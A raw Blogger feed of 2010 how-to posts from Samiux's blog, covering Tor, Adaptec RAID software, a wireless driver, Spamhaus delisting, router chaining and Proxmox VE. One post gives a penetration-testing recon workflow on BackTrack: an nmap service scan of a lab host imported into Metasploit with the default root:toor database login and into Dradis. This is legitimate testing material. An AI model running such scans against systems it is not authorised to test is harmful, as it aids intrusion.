sudo update-rc.d tor defaults&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Reference&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.torproject.org/"&gt;Tor Project&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/2275/"&gt;TorButton&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://trac.torproject.org/projects/tor/wiki"&gt;WiKi of Tor&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-727679273349280281?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/727679273349280281'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/727679273349280281'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/12/howto-onion-router-tor-on-ubuntu-1010.html' title='HOWTO : The Onion Router (Tor) on Ubuntu 10.10 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3891956694886627961</id><published>2010-11-29T16:18:00.000+08:00</published><updated>2010-11-29T16:18:07.521+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='alien'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='Adaptec Storage Manager'/><title type='text'>HOWTO : Adaptec RAID 2405 on Ubuntu 10.10 Desktop</title><content type='html'>&lt;a href="http://www.adaptec.com/en-us/products/controllers/hardware/sas/entry/sas-2405/"&gt;Adaptec RAID 2405&lt;/a&gt; is a 0, 1, 10 Hardware RAID card.  &lt;br /&gt;
&lt;br /&gt;
The &lt;a href="http://www.adaptec.com/en-us/downloads/storage_manager/sm/productid=sas-2405&amp;dn=adaptec+raid+2405.html"&gt;Adaptec Storage Manager&lt;/a&gt; is also working very well on Ubuntu 10.10.  The current version of the Adaptec Storage Manager is v6.5-18579 which is dated August 25, 2010. &lt;br /&gt;
&lt;br /&gt;
The User's Guide can be download at &lt;a href="http://www.adaptec.com/en-us/support/raid/sas_raid/sas-2405/_docs/asm_v6_50_18579_users_guide_for_das_pdf.htm?nc=/en-us/support/raid/sas_raid/sas-2405/_docs/asm_v6_50_18579_users_guide_for_das_pdf.htm"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
This tutorial shows you how to install Adaptec Storage Manager on Ubuntu 10.10 Desktop.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the Adaptec Storage Manager, extract and install.  Let's 64-bit for example.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xzvf asm_linux_x64_v6_50_18579.tgz&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd manager&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install alien&lt;br /&gt;
alien --scripts StorMan-6.50.x86_64.rpm&lt;br /&gt;
sudo dpkg -i storman_6.50-18580_amd64.deb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the Manager by issuing the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo /usr/StorMan/StorMan.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The username and password is the username and password of your Ubuntu 10.10 Desktop (sudoer account).&lt;br /&gt;
&lt;br /&gt;
Remarks : The installation for Adaptec RAID 5805 is similar.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3891956694886627961?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3891956694886627961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3891956694886627961'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/11/howto-adaptec-raid-2405-on-ubuntu-1010.html' title='HOWTO : Adaptec RAID 2405 on Ubuntu 10.10 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8215131735438789979</id><published>2010-11-25T11:34:00.002+08:00</published><updated>2010-11-25T11:34:56.689+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='MySQL'/><category scheme='http://www.blogger.com/atom/ns#' term='Dradis'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='msfconsole'/><title type='text'>HOWTO : Information gathering with Dradis on Back|Track 4 R2</title><content type='html'>&lt;a href="http://dradisframework.org/"&gt;Dradis&lt;/a&gt; is an effective information sharing tool.  It is pre-installed in Back|Track 4 R2.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Setting up Dradis server.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /pentest/misc/dradis/server&lt;br /&gt;
ruby ./script/server&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Open your browser and the address is "&lt;code&gt;https://localhost:3004&lt;/code&gt;".  Accepted the certificate.  Enter your password twice.  Then, login to the system with your desired username and the previous password.&lt;br /&gt;
&lt;br /&gt;
Or, you can use the default username and password, they are "&lt;code&gt;etd&lt;/code&gt;" and "&lt;code&gt;dradis&lt;/code&gt;" respectively.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Setting up Dradis client.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /pentest/misc/dradis/client/conf/dradis.xml&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Locate the following lines.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&amp;lt;option name='restful_user' value='etd'/&amp;gt;&lt;br /&gt;
&amp;lt;option name='restful_password' value='dradis'/&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change the default value of "&lt;code&gt;etd&lt;/code&gt;" and "&lt;code&gt;dradis&lt;/code&gt;" according to the &lt;code&gt;Step 1&lt;/code&gt; above when necessary.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /pentest/misc/dradis/client&lt;br /&gt;
ruby ./dradis.rb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
A "&lt;code&gt;dradis&amp;gt;&lt;/code&gt;" prompt will be displayed.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Start MySQL.  Open a new terminal and execute the following commands :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/mysql start&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;msfconsole&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
At the "&lt;code&gt;msf&amp;gt;&lt;/code&gt;" prompt, enter the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;db_driver mysql&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;db_connect root:toor@127.0.0.1/msf3&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;load db_tracker&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, scan the port of the target "&lt;code&gt;192.168.56.101&lt;/code&gt;" with NMap.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap -v -sV 192.168.56.101 -oA subnet_1&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;db_import subnet_1.xml&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now, you can issue the following commands to inspect the result :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;db_host&lt;br /&gt;
db_services&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go back to the terminal where it has the "&lt;code&gt;dradis&amp;gt;&lt;/code&gt;" prompt.  Issue the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;import nmap /root/subnet_1.gnmap grepable&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, go back to the browser and refresh.  You will see the data has been imported.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Reference&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://dradisframework.org/videos/dradis2-02.html"&gt;How to use Dradis&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8215131735438789979?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8215131735438789979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8215131735438789979'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/11/howto-information-gathering-with-dradis.html' title='HOWTO : Information gathering with Dradis on Back|Track 4 R2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3236530784635604731</id><published>2010-11-25T10:32:00.005+08:00</published><updated>2011-07-15T18:25:20.147+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RTL8191SE'/><category scheme='http://www.blogger.com/atom/ns#' term='Wicd'/><category scheme='http://www.blogger.com/atom/ns#' term='r8192se_pci'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : RTL8191SE wireless card on Back|Track 4 R2</title><content type='html'>Lenovo ThinkPad X100e (Type 3508-65B) is equipped with AMD Athlon Neo MV-40 CPU and Realtek RTL8191SEvB wireless LAN Controller.  It is working perfectly on Ubuntu 10.04 and 10.10.  However, the wirelss card does not work on Back|Track 4 R2 (which is believed to be Ubuntu 8.04 with newer kernel).  In additon, Back|Track 4 R2 is installed with Wicd as network manager.&lt;br /&gt;
&lt;br /&gt;
This tutorial is going to show you how to install the r8191se_pci wireless driver on Back|Track 4 R2. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the official Linux driver from Realtek.  The current version is 0018 dated 2010-Oct-25 at the time of this writing.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=2&amp;PNid=48&amp;PFid=48&amp;Level=5&amp;Conn=4&amp;DownTypeID=3&amp;GetDown=false&amp;Downloads=true#RTL8191SE-VA2"&gt;Download Linux driver at RTL8191SE-VA2 section&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Extract and compile the driver as well as copy the firmware the workable directory.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xzvf rtl8192se_linux_2.6.0019.1207.2010.tar.gz&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd rtl8192se_linux_2.6.0019.1207.2010&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;make&lt;br /&gt;
make install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cp -Ra ~/rtl8192se_linux_2.6.0019.1207.2010/firmware/RTL8192SE/ /lib/firmware&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Load the driver.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;depmod -a&lt;br /&gt;
modprobe r8192se_pci&lt;br /&gt;
ifconfig wlan0 up&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
or, reboot the system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to "&lt;code&gt;Menu&lt;/code&gt;" -- "&lt;code&gt;Internet&lt;/code&gt;" -- "&lt;code&gt;Wicd Network Manager&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Preference&lt;/code&gt;".  Add "&lt;code&gt;wlan0&lt;/code&gt;" to "&lt;code&gt;Wireless interface&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Then click the "&lt;code&gt;Refresh&lt;/code&gt;" button.  Now, you should see the Access Points in the air.  Select your desired Access Point, entered password and surf the internet.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
RTL8191SE wireless card does not support aircrack-ng's injection mode.  You may consider to buy USB wireless adapter, such as TP-Link TL-WN321G, TP-Link TL-WN821N and TL-WN822N.  Or, changes the RTL8192SE to Intel 5100 as they all support monitor and injection modes.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3236530784635604731?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3236530784635604731'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3236530784635604731'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/11/howto-rtl8191se-wireless-card-on.html' title='HOWTO : RTL8191SE wireless card on Back|Track 4 R2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4223917719899784634</id><published>2010-11-20T19:03:00.001+08:00</published><updated>2010-11-20T19:04:26.753+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Spamhaus.org'/><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='spam'/><title type='text'>HOWTO : Remove your IP address from the SPAM blacklist</title><content type='html'>If you are setting up a mail server at home, you will wonder why the recipient cannot receive your email which is sent by your mail server.  The reason is that your IP is blacklisted.&lt;br /&gt;
&lt;br /&gt;
How to overcome this problem?  It is quiet easy and just send a request to the Spamhaus.org to cancel your IP from the blacklist.  For example, your IP is 218.191.114.234.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;http://spamhaus.org/query/bl?ip=218.191.114.234&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
If you find any item is in red colour (e.g. PBL), your IP is blacklisted.  You just click on the link under the red coloured item.  Then, select "&lt;code&gt;Remove an IP from PBL&lt;/code&gt;" button. Usually, SBL and XBL are in green colour.  &lt;br /&gt;
&lt;br /&gt;
Accepted the agreement and click "&lt;code&gt;Remove IP address&lt;/code&gt;" button.  Finally, fill in the blanks and wait for the confirmation email for the confirmation code to fill into the screen provided after you sent the request.&lt;br /&gt;
&lt;br /&gt;
Make sure your email address is not a web based free account, such as gmail, hotmail, or yahoo and etc.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4223917719899784634?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4223917719899784634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4223917719899784634'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/11/howto-remove-your-ip-address-from-spam.html' title='HOWTO : Remove your IP address from the SPAM blacklist'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5282906362037276053</id><published>2010-11-20T12:43:00.002+08:00</published><updated>2010-11-20T12:43:24.041+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wired'/><category scheme='http://www.blogger.com/atom/ns#' term='Router'/><category scheme='http://www.blogger.com/atom/ns#' term='Wireless'/><title type='text'>HOWTO : Wireless Router connects to Wired Router</title><content type='html'>*** This tutorial is written on July 16, 2007 by me.  I repost it here for reference.  The origianl tutorial is &lt;a href="http://samiux.wordpress.com/2007/07/16/router-to-router/"&gt;here&lt;/a&gt;. ***&lt;br /&gt;
&lt;br /&gt;
I have a wired and a wireless routers. I connect them together to make them looking as one router. Then, I can access all the computers within the same intranet.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Router A&lt;/u&gt; (connect to the internet)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I assigned the wired router to be router A which is connected to the internet directly. I did nothing on the Router A. The LAN IP is 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Router B&lt;/u&gt; (connect to the Router A)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I assigned the wireless router to be Router B and I should change the settings of it.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;WAN -&lt;/b&gt;&lt;br /&gt;
Set the WAN IP to be static 192.168.111.2, subnet mask is 255.255.255.0 and gateway is 192.168.111.1, no matter your Router B is wired or wireless. For me, Router B is a wireless. (You can change the WAN IP and gateway to meet your requirement, here is only an example)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;LAN :&lt;/b&gt;&lt;br /&gt;
Disabled DHCP and set the LAN IP to 192.168.0.200, subnet mask is  255.255.255.0, no matter your Router B is wired or wireless. (You can change the LAN IP to meet your requirement, here is only an example)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Connect Router A and Router B via a cable on LAN ports only. WAN port will not be used at the Router B. Connect Router A to the internet as normal. Now, you can access Router A by 192.168.0.1 and Router B by 192.168.0.200 via your browser. Any computer or laptop will be assigned an IP of 192.168.0.XXX.&lt;br /&gt;
&lt;br /&gt;
That’s all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5282906362037276053?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5282906362037276053'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5282906362037276053'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2010/11/howto-wireless-router-connects-to-wired.html' title='HOWTO : Wireless Router connects to Wired Router'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1178142147887179609</id><published>2010-11-20T11:23:00.014+08:00</published><updated>2010-11-21T13:41:42.164+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='KVM'/><category scheme='http://www.blogger.com/atom/ns#' term='Proxmox VE'/><category scheme='http://www.blogger.com/atom/ns#' term='Virtualization'/><category scheme='http://www.blogger.com/atom/ns#' term='Untangle'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Virtualization platform by Proxmox VE</title><content type='html'>&lt;a href="http://pve.proxmox.com/wiki/Main_Page"&gt;Proxmox Virtual Environment (Proxmox VE)&lt;/a&gt; works with virtualization featured CPU (such as Intel VT and AMD-V CPU) and non-virtualization featured CPU.  Virtualization featured CPU is working on full virtualization by KVM technology.  Non-virtualization featured CPU is working on container virtualization by OpenVZ.&lt;br /&gt;
&lt;br /&gt;
This tutorial is mainly on setting up the Proxmox VE with Virtualization featured CPU only.&lt;br /&gt;
&lt;br /&gt;
Proxmox VE does not work on fake RAID or software RAID (RAID on motherboard may consider as fake or software RAID).  Make sure you are using Hardware RAID when necessary.&lt;br /&gt;
&lt;br /&gt;
Why virtualization?&lt;br /&gt;
The answer is &lt;a href="http://pve.proxmox.com/wiki/Virtualization_Platform"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Remarks : Proxmox VE is working fine on Intel Xeon E5420 Quad Core X 2, 16GB ECC DDR2 RAM and 1TB X 6 Hard Drive on Adaptec RAID 6 with 2 Hot Spare (1.8TB for usage).&lt;br /&gt;
&lt;br /&gt;
&lt;object width="960" height="745"&gt;&lt;param name="movie" value="http://www.youtube.com/v/dv2bvX5B-wQ?fs=1&amp;amp;hl=zh_TW&amp;amp;hd=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/dv2bvX5B-wQ?fs=1&amp;amp;hl=zh_TW&amp;amp;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="480"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the latest Proxmox VE at &lt;a href="http://pve.proxmox.com/wiki/Downloads"&gt;here&lt;/a&gt;.  The current version is 1.6-5261-4 (with 2.6.32-4 kernel) at the time of this writing.  The ISO image is 64-bit version.  The ISO image has a hard drive space limitation to 2TB.&lt;br /&gt;
&lt;br /&gt;
If you want to have larger than 2TB hard drive size, you should follow the procedure at &lt;a href="http://pve.proxmox.com/wiki/Install_Proxmox_VE_on_Debian_Lenny"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You should have 3 network interfaces at least where eth0 (vmbr0) is for the Proxmox VE, eth1 (vmbr1) is for connecting to the internet and eth2 (vmbr2) is for the virtual machines.  Where the vmbrX is the virtual network interface for the virtual machines that binded to the physical network interfaces.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install Proxmox VE and follow the instructions on the screen (a mouse is required).  For example, the IP address is 192.68.100.2 and the hostname is proxmox.samiux.com.  The primary DNS and gateway are 192.168.100.1.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
After the installation, the system will be rebooted.  If you do not have a router connected to the Proxmox box, connect the Proxmox VE to a laptop which is set to the IP address 192.168.100.5 manually.  You may require a switch to do so.  (I used to install software based router/UTM, so this procedure is necessary, please see &lt;code&gt;Step 9&lt;/code&gt; for details).&lt;br /&gt;
&lt;br /&gt;
On the browser, type http://192.168.100.2 and then you are directed to the Proxmox VE control panel.  Username is "&lt;code&gt;root&lt;/code&
